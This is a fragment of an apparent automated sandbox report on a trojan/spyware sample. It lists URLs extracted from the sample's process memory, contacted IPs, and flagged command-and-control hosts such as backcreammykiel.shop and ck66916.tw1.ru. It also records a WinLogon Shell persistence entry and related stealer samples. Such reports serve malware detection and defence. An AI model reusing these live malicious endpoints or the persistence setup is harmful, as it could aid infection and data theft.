                      unknown
                      https://duckduckgo.com/chrome_newtabBypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoBypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/?q=Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net03Loader.exe.0.drfalse
                      • URL Reputation: safe
                      unknown
                      http://ocsp.entrust.net02Loader.exe.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.entrust.net/rpa03Loader.exe.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://aia.entrust.net/ts1-chain256.cer01Loader.exe.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001441B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.ecosia.org/newtab/Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ipinfo.ioBypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ck66916.tw1.ruBypass.exe, 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmptrue
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ck66916.tw1.ru/Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmptrue
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://backcreammykiel.shop/BRegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://backcreammykiel.shop:443/apiRegAsm.exe, 0000000D.00000002.1976836408.000000000390D000.00000004.00000800.00020000.00000000.sdmptrue
                      • 17%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://backcreammykiel.shop/sRegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://crl.entrust.net/ts1ca.crl0Loader.exe.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://backcreammykiel.shop/lRegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13Bypass.exe, 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.entrust.net/2048ca.crl0Loader.exe.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://backcreammykiel.shop/RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://www.entrust.net/rpa0Loader.exe.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      34.117.186.192
                      ipinfo.ioUnited States
                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                      104.21.90.18
                      backcreammykiel.shopUnited States
                      13335CLOUDFLARENETUStrue
                      92.53.96.121
                      ck66916.tw1.ruRussian Federation
                      9123TIMEWEB-ASRUtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1461211
                      Start date and time:2024-06-23 06:53:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 11m 38s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:bFZYRLnRIz.exe
                      renamed because original name is a hash value
                      Original Sample Name:289f27e7a02f8e76ebf39d2c0c3f09e4.bin.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@30/247@3/3
                      EGA Information:
                      • Successful, ratio: 80%
                      HCA Information:
                      • Successful, ratio: 67%
                      • Number of executed functions: 134
                      • Number of non-executed functions: 115
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target Bypass.exe, PID 7004 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      00:54:01API Interceptor17x Sleep call for process: powershell.exe modified
                      00:54:14API Interceptor7x Sleep call for process: RegAsm.exe modified
                      00:54:19API Interceptor13771009x Sleep call for process: Bypass.exe modified
                      05:54:22AutostartRun: WinLogon Shell C:\WINDOWS\system32\explorer.exe
                      05:54:31AutostartRun: WinLogon Shell C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      34.117.186.192HP-patchedUS-deobfuscated.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/
                      HP-patchedUS-deobfuscated.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/
                      HP-patchedUS-deobfuscated.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/
                      SecuriteInfo.com.Win32.Evo-gen.24318.16217.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/json
                      SecuriteInfo.com.Win32.Evo-gen.28489.31883.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/json
                      Raptor.HardwareService.Setup 1.msiGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                      • ipinfo.io/
                      Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                      • ipinfo.io/
                      w.shGet hashmaliciousXmrigBrowse
                      • /ip
                      Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      104.21.90.18GlobalCheats.exeGet hashmaliciousLummaC, MicroClipBrowse
                        92.53.96.121http://ct31152.tw1.ru/Get hashmaliciousUnknownBrowse
                        • ct31152.tw1.ru/data/logo.svg
                        http://cb00287.tw1.ru/Get hashmaliciousUnknownBrowse
                        • cb00287.tw1.ru/data/logo.svg
                        http://cv59800.tw1.ru/Get hashmaliciousUnknownBrowse
                        • cv59800.tw1.ru/data/logo.svg
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        backcreammykiel.shopGlobalCheats.exeGet hashmaliciousLummaC, MicroClipBrowse
                        • 104.21.90.18
                        ipinfo.io4h4b4EWVNU.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • 34.117.186.192
                        BqqQh4Jr7L.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        PsHQsuTG0H.dllGet hashmaliciousUnknownBrowse
